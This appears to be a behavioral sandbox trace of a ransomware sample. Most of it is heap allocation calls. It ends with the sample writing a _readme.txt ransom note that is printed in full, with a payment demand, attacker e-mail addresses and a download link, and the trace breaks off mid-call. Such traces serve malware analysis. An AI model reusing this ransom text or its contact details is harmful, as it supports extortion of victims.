[0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.597] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.597] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.598] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.598] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.599] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.599] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.600] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.600] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.601] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.601] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.602] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.602] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.603] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.604] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.604] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.604] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.604] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.604] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.604] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.604] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.604] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.604] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.604] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.604] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.604] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.604] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0209.604] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.604] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.604] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.604] PathFindFileNameW (pszPath="") returned="" [0209.604] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.605] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.605] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.605] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.605] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.605] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.605] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.605] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0209.605] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.605] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.606] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0209.606] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.606] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.606] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 